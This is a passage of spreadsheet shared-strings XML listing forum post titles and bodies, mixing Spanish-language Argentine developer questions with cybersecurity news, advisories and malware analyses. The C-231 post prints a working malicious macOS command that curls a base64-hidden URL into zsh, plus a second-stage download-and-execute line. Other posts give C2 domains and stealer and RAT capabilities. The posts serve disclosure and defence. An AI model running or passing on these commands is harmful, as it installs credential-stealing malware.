    <t>C-199</t>
  </si>
  <si>
    <t>tensorlake@0.5.144: A Worm With Valid Provenance, and the Firewall Rule That Stops It</t>
  </si>
  <si>
    <t>C-200</t>
  </si>
  <si>
    <t>Consulta sobre monetizar APP Android y datos personales (Argentina)</t>
  </si>
  <si>
    <t>Buenas, cómo están? Quería saber si me pueden ayudar con unas consultas que tengo sobre una APP que estoy terminando de armar. Ya tuve los 14 días de pruebas de testers en Android y quiero publicarla. La APP funcionaría con una suscripción mensual de pocos dólares (y 30/60 días de prueba). Por lo que leí al monetizarla se publican mis datos personales (Dirección y creo que alguna cosa más en google para acceso público). La verdad que eso mucho no me copa. Saben si esto es realmente así y si se puede hacer algo para que no pase? También tengo dudas con el tema monotributo, seguramente eso lo tenga que hablar con mi contador, pero quizás alguno ya tiene experiencia en cómo se hacen los pagos, facturación y esas cosas. Si este post no corresponde a esta comunidad me avisan y lo borro sin problema. Desde ya muchas gracias a todos, Un abrazo!! [link] [comments]</t>
  </si>
  <si>
    <t>C-201</t>
  </si>
  <si>
    <t>Cursos o Recursos que sientas que les hayan aportado algo</t>
  </si>
  <si>
    <t>Hola, este no es el 5to post quejandose que no hay laburo. Estoy queriendo complementar mis proyectos personales y la carrera (Ingeniería en Sistemas) para profundizar en temas de desarrollo Backend o arrancar capaz con Ingeniería en IA. Conocen algun curso/Recursos que aporte algo serio? no la tipica de 5 modulos de fundamentos Javascript y ultimo modulo "hacete un crud, gordito". Sino algo que asuma que ya tenes ciertos conocimientos. Vi varios de coderhouse que estan dentro de todo ""baratos"". No se, que opinan? Ps: formato de celular sepan disculpar a alguien que prefiere escribir a pedirle a una LLM que me lo formatee jajajsjaja [link] [comments]</t>
  </si>
  <si>
    <t>C-202</t>
  </si>
  <si>
    <t>Warning: Axqua VS Code extension is MALWARE</t>
  </si>
  <si>
    <t>C-203</t>
  </si>
  <si>
    <t>CVE-2026-77179: Docker's hypervisor for Mac compromised (Docker Desktop, Docker Sandboxes)</t>
  </si>
  <si>
    <t>C-204</t>
  </si>
  <si>
    <t>Your SBOM Is Fan Fiction</t>
  </si>
  <si>
    <t>C-205</t>
  </si>
  <si>
    <t>Fake Claude Install Guide Delivers Six-Stage macOS Stealer and RAT, Huntress Finds</t>
  </si>
  <si>
    <t>C-206</t>
  </si>
  <si>
    <t>Researchers at Apiiro identified 17,610 malicious GitHub repositories associated with a campaign called FakeGit.</t>
  </si>
  <si>
    <t>Researchers at Apiiro identified 17,610 malicious GitHub repositories associated with a campaign called FakeGit. The repositories are designed to resemble legitimate software projects. Many contain convincing documentation and download buttons. However, the downloads can deliver SmartLoader, a malware loader associated with the StealC information stealer. StealC is designed to steal sensitive information such as credentials and browser session data. Researchers discovered that attackers were repeatedly updating existing repositories rather than constantly creating new ones. This allowed the campaign to reuse established repositories and redirect visitors toward fresh malicious downloads. Some repositories were associated with accounts that appeared to belong to legitimate developers. Original security research published October 6, with subsequent reporting. The 17,610 figure represents the researchers' observed campaign inventory, not a verified count of repositories still active today. This directly affects people who download privacy software, cybersecurity utilities, cryptocurrency tools, and other open-source applications. A project being hosted on GitHub does not automatically make it trustworthy. Attackers can create convincing repositories or compromise legitimate developer accounts. [link] [comments]</t>
  </si>
  <si>
    <t>C-207</t>
  </si>
  <si>
    <t>Pelea entre postulante y startup</t>
  </si>
  <si>
    <t>me encontré este hilo de twitter, y me pareció interesante lo que plantea. qué opinan? https://x.com/dutruss/status/2109364702430327015?s=20p [link] [comments]</t>
  </si>
  <si>
    <t>C-208</t>
  </si>
  <si>
    <t>73 Microsoft GitHub repositories impacted by Miasma malware</t>
  </si>
  <si>
    <t>C-209</t>
  </si>
  <si>
    <t>Estoy terminando mi 4to año en Lic. en Sistemas de Información en la UNNE. Quiero centrarme en la rama QA Automation o AppSec (ciberseguridad). Que opción en mejor para conseguir laburo en el corto plazo en Argentina?</t>
  </si>
  <si>
    <t>C-210</t>
  </si>
  <si>
    <t>Me la giga mandé y te lo cuento</t>
  </si>
  <si>
    <t>Hola comunidad! Espero que estén muy bien! Les tiro el lore sin vueltas: Soy data engineer con stack en Azure, Databricks y GCP. Hasta Junio estaba trabajando en una empresa de seguros gringa que tiene un estadio muy importante... Resulta que me cansé del no reconocimiento, estancamiento y boludeo... En caliente me fui a la consultora de los ravioles... Resulta que todo está recontra tenso y si bien califico bien como lead en entrevistas no estaría sabiendo como buscar laburo de forma activa dado que LinkedIn está llena de humo y falopa. En fin, se viene el mangazo... Alguno sabe de alguna empresa que esté buscando DE con varios años de experiencia, personalidad chill y buena capacidad de comunicación? [link] [comments]</t>
  </si>
  <si>
    <t>C-211</t>
  </si>
  <si>
    <t>SonicWall SMA1000 campaign: standalone Linux Impacket secretsdump deployed onto appliances (SHA-256 inside)</t>
  </si>
  <si>
    <t>Campaign where the operator deployed a standalone Linux build of Impacket's secretsdump directly onto compromised SonicWall SMA1000 appliances and ran credential theft from there. It was pulled to the box with curl to /tmp/secretsdump, made executable, then used against internal domain controllers. Sample: secretsdump, 9,983,640 bytes, SHA-256 690f5031deede7d3357d0ca24c89866ae8c60e6c63b3a2c8bba813a6ac10ae5b, served over HTTP from 95.181.173[.]36. The surrounding Python tooling (exploit, LDAP extractor and decryptor, DCSync automation) came from the same open directory. Full toolkit breakdown and IOCs below. https://hunt.io/blog/sonicwall-sma1000-uk-council-attack [link] [comments]</t>
  </si>
  <si>
    <t>C-212</t>
  </si>
  <si>
    <t>Malicious APK [Google IPTV] reportedly causing financial losses.</t>
  </si>
  <si>
    <t>C-213</t>
  </si>
  <si>
    <t>¿Cambiar de carrera realmente significa empezar desde cero? Mi experiencia combinando ventas B2B con Data Analytics.</t>
  </si>
  <si>
    <t>Últimamente he estado reflexionando sobre algo que me pasó durante mi proceso de aprendizaje en Data Analytics. Durante años trabajé principalmente en áreas comerciales: ventas B2B, desarrollo de cuentas, telecomunicaciones, tecnología y servicios financieros. Mi trabajo consistía, entre otras cosas, en entender necesidades de clientes, identificar oportunidades comerciales, analizar indicadores y encontrar soluciones a problemas de negocio. Después decidí estudiar Data Analytics. Y al principio veía ambos mundos como caminos profesionales diferentes: Por un lado, la experiencia comercial. Por otro, Python, SQL, estadística, análisis de datos y demás herramientas técnicas. Pero conforme avanzaba en mi formación en TripleTen, comencé a darme cuenta de algo. Muchas de las preguntas que intentaba responder desde el área comercial eran exactamente las mismas que podía investigar utilizando Data Analytics. Por ejemplo: ¿Por qué están disminuyendo las ventas? ¿Qué clientes tienen mayor probabilidad de abandonar un servicio? ¿Qué indicadores realmente nos ayudan a entender el desempeño de un negocio? ¿Qué factores podrían estar afectando nuestros resultados? La diferencia era que ahora tenía nuevas herramientas para abordar esas preguntas. Y eso cambió bastante mi perspectiva. No tenía que elegir entre mi experiencia comercial y mi formación en datos. Podía aprovechar ambas. Obviamente, eso no significa que por tener experiencia comercial automáticamente sepas analizar datos. Hay que estudiar, practicar, equivocarse y desarrollar las habilidades técnicas necesarias. Pero tampoco significa que toda tu experiencia anterior se vuelva irrelevante. En mi caso, entender cómo funciona un negocio, cómo se relacionan las empresas con sus clientes y cómo se toman decisiones comerciales me ha servido para darle contexto a lo que aprendo técnicamente. Y hoy me resulta mucho más interesante pensar en cómo conectar: Negocio + Data + Tecnología. Creo que a veces hablamos de las transiciones profesionales como si fueran un reinicio completo, cuando también pueden ser una evolución de lo que ya sabemos hacer. Me gustaría conocer otras experiencias. ¿Alguien aquí ha cambiado de profesión o aprendido una especialidad completamente diferente? ¿Qué habilidades de su trabajo anterior terminaron siendo más útiles de lo que esperaban? ¿O en su caso sí sintieron que tuvieron que comenzar prácticamente desde cero? [link] [comments]</t>
  </si>
  <si>
    <t>C-214</t>
  </si>
  <si>
    <t>We Let AI Fuzz Adobe Reader for a Week. It Found a Critical Zero-Day CVE-2026-81983</t>
  </si>
  <si>
    <t>C-215</t>
  </si>
  <si>
    <t>Outlook automatically clicks the “unsubscribe” hyperlink of malicious emails when reporting them as phishing.</t>
  </si>
  <si>
    <t>C-216</t>
  </si>
  <si>
    <t>¿Demasiada casualidad que Globant sea el patrocinador?</t>
  </si>
  <si>
    <t>C-217</t>
  </si>
  <si>
    <t>Oh Look, The Foot Gun Went Off Again (Citrix NetScaler PreAuth Command Injection CVE-2026-88771) - watchTowr Labs</t>
  </si>
  <si>
    <t>C-218</t>
  </si>
  <si>
    <t>Community Threat Notice: Citrix NetScaler ADC and NetScaler Gateway Vulnerabilities</t>
  </si>
  <si>
    <t>Citrix has disclosed eight vulnerabilities in NetScaler ADC and NetScaler Gateway; including two actively exploited. NetScaler ADC and NetScaler Gateway sit at the network perimeter, handling VPN, remote access, load balancing, and authentication for enterprise environments, making compromise a high-impact event with broad downstream consequences. CVE-2026-88771 | 9.5 Critical | Improper Input Validation An unauthenticated attacker can exploit this vulnerability to run arbitrary commands on the appliance. This vulnerability affects all NetScaler ADC and NetScaler Gateway deployments on an affected version, including those in the default configuration. CVE-2026-88772 | 9.5 Critical | Memory Overflow An attacker can exploit this vulnerability to achieve remote code execution or cause a denial-of-service condition. This vulnerability affects appliances with DTLS enabled, which is on by default for VPN virtual servers on NetScaler Gateway. Citrix has confirmed that both vulnerabilities have been exploited in the wild against unmitigated NetScaler deployments, and both have been added to the CISA Known Exploited Vulnerabilities catalog. Other vulnerabilities included in the advisory, but not reported as actively exploited CVE-2026-88773 | 9.3 Critical | HTTP Request Smuggling CVE-2026-88774 | 7.0 High | Policy Bypass CVE-2026-88775 | 8.8 High | Memory Overflow CVE-2026-88776 | 8.8 High | Memory Overflow CVE-2026-88777 | 8.8 High | Memory Overflow CVE-2026-88778 | 8.8 High | TCP Initial Sequence Number (ISN) Prediction Recommendations Immediate Action: Apply Citrix-released updates to all affected NetScaler ADC and NetScaler Gateway appliances immediately. Restrict NetScaler management interfaces to trusted internal networks and administrative hosts. Review vulnerable appliances for signs of unauthorized access or persistence, including systems already patched. Monitor authentication activity and connections from NetScaler appliances for suspicious or unexpected behavior. Rotate credentials, certificates, and secrets if compromise or unauthorized access is suspected. References Citrix Advisory [link] [comments]</t>
  </si>
  <si>
    <t>C-219</t>
  </si>
  <si>
    <t>Death By A Thousand PaperCuts (PaperCut Pre-Auth RCE Chain and Patch Bypasses WT-2026-0141-0144/CVE-2026-82077/CVE-2026-82078/CVE-2026-81578) - watchTowr Labs</t>
  </si>
  <si>
    <t>C-220</t>
  </si>
  <si>
    <t>Ahora “hackearon” también Mi Argentina (lo pongo entre comillas porque lo más probable es que un compatriota lo haya filtrado por dos sugus y una coca)</t>
  </si>
  <si>
    <t>C-221</t>
  </si>
  <si>
    <t>You Won’t Hear About These, Even In Myths (Atlassian Jira, Confluence (and more) Pre-Auth Arbitrary File Read CVE-2026-21589) - watchTowr Labs</t>
  </si>
  <si>
    <t>C-222</t>
  </si>
  <si>
    <t>Is This A Joke? In The Auth Header? (F5 BIG-IP UnAuth Heap-Overflow to RCE CVE-2026-94127) - watchTowr Labs</t>
  </si>
  <si>
    <t>C-223</t>
  </si>
  <si>
    <t>Fortinet Privileged Access Agent: Any Site Could Control Your Proxy and Watch Your Tab</t>
  </si>
  <si>
    <t>TL;DR. The FortiPAM Chrome extension (1M+ users), used for Privileged Access Management, allowed any site to set the browser's proxy for the session, alongside allowing any site to create a new tab and send screen recordings of it to an attacker's server. That makes for trivial phishing attacks which only require the user to view something sensitive in the attacker-opened tab. CVSS 9.1 | CVE-2026-84388. [link] [comments]</t>
  </si>
  <si>
    <t>C-224</t>
  </si>
  <si>
    <t>ICMP-Ghost: Fileless C2 with ICMP &amp; DNS Tunneling in Pure x64 Assembly | Suricata Bypassed</t>
  </si>
  <si>
    <t>C-225</t>
  </si>
  <si>
    <t>Wordpress libheif RCE</t>
  </si>
  <si>
    <t>C-226</t>
  </si>
  <si>
    <t>Technical analysis of Parivahan App ( shared on ScamIndia by /u/ImpressiveYouth3990 couple of days back )</t>
  </si>
  <si>
    <t>Fake mParivahan : Malware Analysis Report 422 Users are affected by it till now ( I was able to get the attackers admin panel ) Classification: Critical : Android SMS / UPI spyware RAT Method: Static reverse engineering of dropper + payload; no-root payload extraction; StringFog decryption; read-only Firebase C2 IOC enumeration 1. Executive summary Marketed as “M Parivahan” is a two-stage Android malware operation: Dropper (com.ioaheishsbsb.ljgcdfhm) : NP Manager–packed installer with a fake VPN / WebView UI that decrypts and sideloads an embedded APK (output.apk). Payload (com.veaheishsbsb.kekskks) : Sketchware-style SMS/call spyware with Firebase Realtime Database command-and-control and Telegram first-run alerts. The payload steals SMS and device telemetry, can forward SMS and calls, and can send SMS from the victim’s SIM (commonly abused for UPI / OTP fraud). At the time of analysis the Firebase panel was reverse engineered too and contained 422 client device IDs. 2. Sample identification Field Stage 1 (Dropper) Stage 2 (Payload) Package com.ioaheishsbsb.ljgcdfhm com.veaheishsbsb.kekskks Related / alias com.mr_fox.bhai Label: “M Parivahan” Application class NP Manager shell np.protect.assets.ShellApplication Protection NP Manager (libnp_protect_res.so, xhook) NP Manager + StringFog XOR UI Fake VPN + file:///android_asset/main_ui.html Permission / settings-style UX Embedded artifact Logical asset output.apk (encrypted on disk) — SDK — minSdk 21, targetSdk 28, compileSdk 33 Build leftover — Synthetic names: dApp-binance-Trading-Signals Related package queried by dropper: com.avejfhdhd.android 3. Infection chain Victim sideloads fake “mParivahan” APK │ ▼ Dropper (NP Manager) decrypts embedded payload │ ▼ Writes temp_info.apk / temp_install.apk → installs com.veaheishsbsb.kekskks │ ▼ Payload requests SMS / phone permissions │ ▼ MyService enrolls device on Firebase + dumps ~50 SMS │ ▼ Telegram alert to operator bot/chat │ ▼ Listens on clients/&lt;deviceId&gt;/webhookEvent for remote commands Extraction note: Static decrypt of the packed dropper blob failed due to native crypto. Payload was recovered without device root by patching the unpack path to getExternalFilesDir and pulling /sdcard/Android/data/com.ioaheishsbsb.ljgcdfhm/files/temp_info.apk. 4. Capabilities Capability Severity Detail SMS theft Critical Intercepts inbound/outbound SMS; uploads to messages/&lt;deviceId&gt; SMS forward Critical Relays SMS to operator number (SmsForwardTo) Remote SMS send Critical Sends SMS from chosen SIM (sendSms webhook) Call forwarding High USSD **21*&lt;number&gt;# / ##21# Device fingerprinting High Model, Android version, root, storage, CPU, carrier, public IP, SIMs, battery, MSISDN Telegram notify High First-run HTML report to admin bot/chat Persistence High Foreground service, boot/alarm receivers, restart in onDestroy Keylogger flag Medium KeyLogger webhook present; appears stubbed/partial 5. Remote command surface Listener path: clients/&lt;androidId&gt;/webhookEvent/ Command</t>
  </si>
  <si>
    <t>C-227</t>
  </si>
  <si>
    <t>New malware delivery method posing as Cloudflare</t>
  </si>
  <si>
    <t>C-228</t>
  </si>
  <si>
    <t>Implant Encryption via the Dump Encoding Library</t>
  </si>
  <si>
    <t>C-229</t>
  </si>
  <si>
    <t>Publicando mi primera app desde Argentina: ¿cómo fue el proceso de configurar los pagos en Play Console, App Store Connect y AdMob?</t>
  </si>
  <si>
    <t>Hola! Voy a publicar mi primera app y quiero dejar resuelto el cobro antes de que lleguen los primeros pesos (dólares, bah). Busqué bastante, pero casi todo lo que encontré es viejo (época del cepo) o son blogs, así que prefiero preguntarles a los que ya lo hicieron. Lo que entendí hasta ahora: - Google Play, AdMob y App Store piden una cuenta bancaria en Argentina, en dólares, con Hola! Estoy por publicar mi primera app (Flutter, Android y iPhone) y estoy configurando las tres consolas. Quería preguntarles por el lado técnico/de proceso a los que ya publicaron desde acá, porque hay cosas que no están claras en la documentación: Play Console: ¿qué les pidió para habilitar compras dentro de la app (perfil de pagos, datos de identidad)? ¿Se puede crear el producto antes de cargar los datos bancarios, o lo exige antes? App Store Connect: el acuerdo de apps pagas y la compra dentro de la app, ¿qué datos pidió y cuánto tardó en quedar aprobado? AdMob: el formulario de pagos pide SWIFT y CBU. ¿Se puede publicar la app y mostrar anuncios con eso sin completar, o bloquea algo? Compra "Quitar anuncios" (no consumible): ¿algún problema que les haya pasado con la revisión de Apple o la prueba en Play (sandbox, licencias de prueba)? ¿Algo que les hubiera gustado saber del proceso de publicación antes de arrancar? Gracias!! [link] [comments]</t>
  </si>
  <si>
    <t>C-230</t>
  </si>
  <si>
    <t>I unpacked a fake mParivahan APK: fake Google Play update, UPI phishing, SMS control and a hidden C2 and firebase backend</t>
  </si>
  <si>
    <t>C-231</t>
  </si>
  <si>
    <t>Not a security person... got hit by an undocumented macOS stealer campaign, reverse engineered it, and tried to take the whole operation down.</t>
  </si>
  <si>
    <t>DISCLAIMER: I'm a biochem student with no cybersecurity background. Tonight I got tricked into running a malicious terminal command I found via a Google Ad. I spent the next 3 hours with Claude AI trying to figure out exactly what happened. Posting because nobody has documented this campaign yet, this is also my first post on this subreddit so I apologize beforehand... Code samples are posted for research purposes only. Do not execute anything in this post. First! My disk space was low on my mac so I search on Google "low disk space mac". Clicked the first thing and it was actually a Google Ad that led to clearspark28[.]com which was a pixel-perfect clone of Apple's support website, fake Apple copyright footer and all. It told me to paste a command into Terminal to "clean up disk space." I pasted it. The moment I hit enter I knew something was wrong (too good to be true). I know, in hindsight that was so damn obvious but I was distracted during that time... THE COMMAND: echo "Downloading Update: https://support.apple.com/storage/cleanup-2.3.15" &amp;&amp; curl -s $(echo "aHR0cHM6Ly9jZWRhci1zYXRpbi5jb20vY3VybC8xZmFjMThmNDc2MjIzNGE0M2Y2NWFkNWMyNzQxOWM3MzdlZDBlYWYxNDA4Yzg3NTRkMjhiMWUwMzI5NDg4NmNi" | openssl base64 -d -A) | zsh The fake Apple URL is just text printed to the screen. The real URL is base64 encoded and hidden, it points to cedar-satin[.]com. macOS showed a permission prompt asking for Finder access. I denied it. I think that stopped the attack. Downloading the script without executing it revealed: - Mostly junk padding (fake variables, meaningless loops) - A gzip compressed, base64 encoded hidden payload - Everything executed via eval so it never touches disk Decompressing the payload revealed octal encoded strings hiding all the real commands. Tracking beacon (fires immediately on execution): hxxps://amber-22[.]com/api/metrics/run?event=pasted With headers: user: AxkPZnSWtzN7LfXvNn7o_H6WDDJ-oCP5b2gqZVITruE BuildID: a5m2yvGoDVLVNY7hEYjAz0Dksst8zgbvil3Vx-s3rQs Second stage download and execution: curl -o /tmp/helper hxxps://cedar-satin[.]com/[path]/cleaner3/update &amp;&amp; xattr -c /tmp/helper &amp;&amp; chmod +x /tmp/helper &amp;&amp; /tmp/helper The binary was intended to steal browser credentials. It never executed because Finder access was denied. clearspark28[.]com: fake Apple phishing page (Host: FEMOIT, GB ([abuse@as214351.com](mailto:abuse@as214351.com))) amber-22[.]com: victim tracking beacon (Host: Limited Network LTD, Romania ([abuse@btcloud.ro](mailto:abuse@btcloud.ro))) cedar-satin[.]com: malware payload server cedar-satin[.]com was registered: May 24, 2026 Attack observed: May 26, 2026 Registrant: M-- N--- Address: TX somewhere (Almost certainly fake) Nameservers: Cloudflare The initial attack vector was a paid Google Ad (Campaign ID: 23886301396). This means someone paid Google with a real payment method to target people searching for Mac storage help. WHAT I COULDN'T GET: The actual /tmp/helper binary, it was never written to disk on my machine so I h</t>
  </si>
  <si>
    <t>C-232</t>
  </si>
  <si>
    <t>Remus Stealer - 64bit evolution of Lumma</t>
  </si>
  <si>
    <t>Remus Stealer is a rapidly evolving Malware-as-a-Service infostealer that emerged in 2026. Remus also shifted from Lumma's 32-bit architecture and traditional resolvers to 64-bit with EtherHiding and enhanced anti-analysis (e.g., sandbox DLL checks, PST honeypot detection). It utilizes EtherHiding, storing C2 addresses in Ethereum smart contracts to avoid takedowns. The malware steals credentials, browser cookies, authentication tokens, and cryptocurrency wallet data. Session theft is one of Remus's most dangerous capabilities because it can bypass MFA by stealing active session cookies directly from browser memory. The malware shows strong technical similarities to Lumma Stealer and may represent its evolutionary successor. Financial services, healthcare, government, technology firms, and MSPs are particularly attractive targets. Common infection vectors include phishing, fake software downloads, malvertising, and fake CAPTCHA campaigns, as well as SEO poisoning and fake GitHub projects to trick tech-savvy users. See whole ANY.RUN execution chain at https://app.any.run/tasks/ae43628b-9d56-4c43-abac-fae7266c749f/ Check out whole malware analysis report at https://any.run/malware-trends/remus/ [link] [comments]</t>
  </si>
  <si>
    <t>C-233</t>
  </si>
  <si>
    <t>‘Nightmare Scenario’: Zero-Click Spyware Is Infecting Phones via Targeted Ads</t>
  </si>
  <si>
    <t>C-234</t>
  </si>
  <si>
    <t>Out of Bounds, Out of Sandbox: RCE in Go JavaScript Engine</t>
  </si>
  <si>
    <t>C-235</t>
  </si>
  <si>
    <t>We uncovered new .NET RAT — SnakeBiteAgent</t>
  </si>
  <si>
    <t>C-236</t>
  </si>
  <si>
    <t>Golang BYOVD Malware Loader and Vulnerable Driver Analysis</t>
  </si>
  <si>
    <t>C-237</t>
  </si>
  <si>
    <t>SnappyClient Exposed: Remote Access, Data Theft, and a Blind Spot for Defenders</t>
  </si>
  <si>
    <t>C-238</t>
  </si>
  <si>
    <t>Integracion MP - Cobros excesivos y retencion del dinero por muchos dias.</t>
  </si>
  <si>
    <t>Hola como estan? Mi problema es el siguiente, hice la integracion con mercadopago pero me parece que son excesivos hay alguna manera de reducir el costo? o algo que no estoy viendo? 6.29% + IVA termina representando casi un 7.6% real del dinero bruto de tu venta, sin contar las retenciones de impuestos nacionales o provinciales que se suman después Me parece UN ROBO pero mal. Alguna solucion? bypass? otro provider de pagos? con webhook que no sea tan usurero? O como lo resuelven ustedes? Gracias chicos! [link] [comments]</t>
  </si>
  <si>
    <t>C-239</t>
  </si>
  <si>
    <t>Fake Interview deploys stealthy cross platform (macOS/Windows) through npm package install in take home assessment</t>
  </si>
  <si>
    <t>NPM supply chain hidden as main payload in a take home project for a fake job interview.. [link] [comments]</t>
  </si>
  <si>
    <t>C-240</t>
  </si>
  <si>
    <t>Fraudulent use of credit card on PayPal after .exe execution</t>
  </si>
  <si>
    <t>Hello, I was trying to download a game from www.ziperto.com and after downloading a file I accidentally run a ~600 Kb .exe (I know, I wanted to hit backspace to delete the folder, instead I hastily pressed enter). I then got a message that the executable was not compatible with Windows. The morning after I've got a notification from my bank about a purchase I didn't make on PayPal, and hundreds of emails in my inbox. I flagged the purchase, changed my passwords, and blocked my card. It seems a strange coincidence with the .exe. I now ran MalwareBytes and Defender deep scan, nothing was found, but I am still paranoid that something is running on my PC. I checked and couldn't find any browser-proxy installed or any strange service or executable, but I am still paranoid. I don't have 2FA on PayPal as I have never use it but I am wondering how they got into my PayPal account from another device, even with the password I usually have to confirm the access from a secondary email. My PC was turned off when the purchase happened. Any idea how this could have happened and what should I check on my PC? I would like to avoid wiping the whole Windows 10 installation. [link] [comments]</t>
  </si>
  <si>
    <t>C-241</t>
  </si>
  <si>
    <t>Estoy en segundo de una ingeniería (no informática) y no se si continuarla</t>
  </si>
  <si>
    <t>Estoy en segundo año de una ingenieria, me esta yendo relativamente bien con todas las materias (meti todas las del plan de estudios hasta ahora) pero me siento muy desmotivado. Hay varios factores que me hacen entrar en crisis: 1) La facultad en la que me encuentro es púbica pero muy chiquita, nos afectan mucho los paros y cada vez tenemos menos docentes porque renunciaron un par. Con respecto a este tema, recibí bastantes comentarios negativos acerca de la institución y oor más que a mi me parecen mala leche no puedo evitar que me afecten, como qe siento que el esfuerzo que estoy haciendo queda deslegitimado. 2) Elegí esta ingeniería pensando solamente en que queria entrar al Balseiro, cosa que con 18 años me parecia una re idea, pero hoy en dia con 20 no tengo muy en claro ese objetivo. 3) Siempre me gusto el mundo de IT y en realidad mi "carrera ideal" a los 18 era ciencias de la computacion en ciudad universitaria pero me queda demasiado lejos de mi casa. 4) Hoy en día puedo ir a la UNLP que es una universidad mucho mas grande que la mía y quizá no este tan afecada por la situación actual. 5) La ingeniería que edtoy haciendo en bastante de "nicho" y creo que no me puedo meter a muchos rubros ademas del de la medicina. Me gustaría saber, en base a sus propias experiencias, qué licenciaturas me recomiendan de la UNLP o de la UBA? La verdad me gustan las materias de matemática, lógica, etc. así que disfruto las cursadas teoricas. Me gusta micho también todo el tema del software libre aunque no creo que sea un dato muy relevante en cuanto a mi formacion profesional. Si alguno tiene una experiencia relativamente similar a la mía, cómo resolvió su crisis? Nada, muchas gracias y perdón la cantidad de texto :) [link] [comments]</t>
  </si>
  <si>
    <t>C-242</t>
  </si>
  <si>
    <t>Recovering a removed npm malware file using Software Heritage and a surviving CDN digest</t>
  </si>
  <si>
    <t>I wrote up my investigation into @goodjavascript/dotenv@1.0.0, including how to recover its entry-point file after the npm tarball and jsDelivr file URLs returned 404. The useful detail: Software Heritage’s latest snapshot contained only the security placeholder. An older snapshot retained the original release and its 840-byte index.js. Its SHA-256 matched the digest still available in jsDelivr’s file manifest. Static inspection showed a timer scheduled at module load that collects host information and can execute JavaScript supplied in a server response. The package had no installation scripts, and its exported config() function was empty. The article includes the package-to-archive discovery steps, dated evidence, an annotated code excerpt and a Python verifier that retrieves and hashes the file without executing it. It also links my analysis contribution to the existing OSV advisory. https://cgsec.dev/research/dotenv-recovery/ This concerns the scoped @goodjavascript/dotenv package, not the unscoped dotenv package. Have you used other archives or retained metadata sources to recover removed package evidence? [link] [comments]</t>
  </si>
  <si>
    <t>C-243</t>
  </si>
  <si>
    <t>AhsayCBS Deep-Dive: Auth Bypass to RCE</t>
  </si>
  <si>
    <t>C-244</t>
  </si>
  <si>
    <t>IronChain Ransomware Threatens Businesses with Permanent Data Loss and Costly Downtime</t>
  </si>
  <si>
    <t>C-245</t>
  </si>
  <si>
    <t>A story of wifi secrets, UART lockdowns and a damaged flash memory chip</t>
  </si>
  <si>
    <t>C-246</t>
  </si>
  <si>
    <t>Stress test del corte de luz en CABA 19 septiembre</t>
  </si>
  <si>
    <t>El 19 de spetiembre se corto la luz practicamente toda la zona norte de caba y hice un stress test (sin conectividad y todo mi alrededor) Esto es seguimiendo de gps con internet practicamente muerto y obviamente trafico colapsado en av maipu, av mitre y av cabildo por que no habian semaforos ida: linea 161 caminata vuelta: linea 67 saludos [link] [comments]</t>
  </si>
  <si>
    <t>C-247</t>
  </si>
  <si>
    <t>C-248</t>
  </si>
  <si>
    <t>Hoy se despide Messi de la Selección e hice esto: sus 207 partidos como un contribution graph de GitHub</t>
  </si>
  <si>
    <t>Hoy a la tarde se me ocurrió despedir a Leo con algo bien de dev: cada partido con la Selección es un cuadradito y, cuanto más celeste, más goles hizo. 207 partidos, 125 goles, del debut en 2005 a la final del Mundial 2026. El cuadradito 208 es el de esta noche contra Benín y cambia de estado solo según el horario. Lo armé en un par de horas con Next.js 15, TypeScript, Tailwind v4, GSAP (ScrollTrigger + SplitText) y Lenis, deployado en Vercel. 🌐 https://207messi.vercel.app 📦 https://github.com/tobiager/207 Cualquier feedback sobre el diseño o la performance es bienvenido. Gracias, Leo 💙 [link] [comments]</t>
  </si>
  <si>
    <t>C-249</t>
  </si>
  <si>
    <t>Police take down SocGholish, maker of major pop-up scams</t>
  </si>
  <si>
    <t>On June 18, an international police operation seized the servers behind the fake "update your browser" pop-up, the one that has been tricking people into installing malware since 2017. They took down 106 servers and domains and scrubbed the malware off 14,971 hacked websites. Dutch police, who led the operation, say the login details for 1.4 million websites were exposed in the process. The breach-notification service Have I Been Pwned was handed 154,000 email addresses and more than half a million passwords from the haul. Canada's federal police disinfected 2,488 computers and notified every Canadian victim they could identify. The Netherlands, the FBI, Germany, and Canada ran it together with Europol behind them, as part of an ongoing campaign called Operation Endgame that has spent two years knocking out malware services hundreds of servers at a time. SocGholish is tied to Evil Corp (yes, that's really their name), a Russian group that law enforcement knows well. The US, UK, and Australia have all sanctioned Evil Corp. Its alleged leader, Maksim Yakubets, carries a $5 million FBI bounty and is believed to have worked with Russian intelligence. [link] [comments]</t>
  </si>
  <si>
    <t>C-250</t>
  </si>
  <si>
    <t>No Time to Pwn – Can AI Find and Exploit the Linux Kernel?</t>
  </si>
  <si>
    <t>C-251</t>
  </si>
  <si>
    <t>Participación en investigación sobre IA</t>
  </si>
  <si>
    <t>Buenas! Estamos realizando la validación de escalas para medir la confianza y las preocupaciones que produce el uso de IA en estudiantes universitarios, como parte de un proyecto doctoral CONICET. Podes darnos una mano realizando la siguiente encuesta: https://forms.gle/u6EExFztf3c1TuwC6 El único requisito es ser estudiante o graduado de una universidad argentina. Mil gracias a quien pueda participar! Es de mucha ayuda :) [link] [comments]</t>
  </si>
  <si>
    <t>C-252</t>
  </si>
  <si>
    <t>Nine files, two payloads: a Silver Fox sideloade…</t>
  </si>
  <si>
    <t>C-253</t>
  </si>
  <si>
    <t>Experiencias - IOL MCP/API</t>
  </si>
  <si>
    <t>Buenas, alguno me cuenta experiencias con el MCP de IOL o su API? Estoy viendo de abrir una cuenta y me parece un feature diferencial sobre otros brokers. Gracias. [link] [comments]</t>
  </si>
  <si>
    <t>C-254</t>
  </si>
  <si>
    <t>Harvard and 140 other legitimate websites compromised</t>
  </si>
  <si>
    <t>Harvard and ~140 other compromised legitimate sites are now spreading ClickFix malware. hxxps://hir.harvard.edu/israel-and-international-football-a-breaking-point/ hxxps://hir.harvard.edu/a-better-way-forward-an-interview-with-paul-ryan/ Both contain a remote load script in it's HTML that reverses it's C2 sj.ssc/ipa/orp.eralfduolccitats to original form and then displays the ClickFix box from it. C2: hxxps://staticcloudflare.pro AnyRun identifies the loading pattern well: https://app.any.run/tasks/2ac73567-8bdf-41b0-999e-08057deb3dd3 https://app.any.run/tasks/8362c5f5-11ab-4b34-b7a5-8e2fb2d6355c Sandbox detonation of one of the ClickFix payloads: https://app.any.run/tasks/bf4b5c8d-f76d-4398-b465-9a1d8ec899bb Original post and more discovered compromised URL's: https://x.com/rifteyy/status/2057842147630411877 [link] [comments]</t>
  </si>
  <si>
    <t>C-255</t>
  </si>
  <si>
    <t>entrar a logística en ves de programación???</t>
  </si>
  <si>
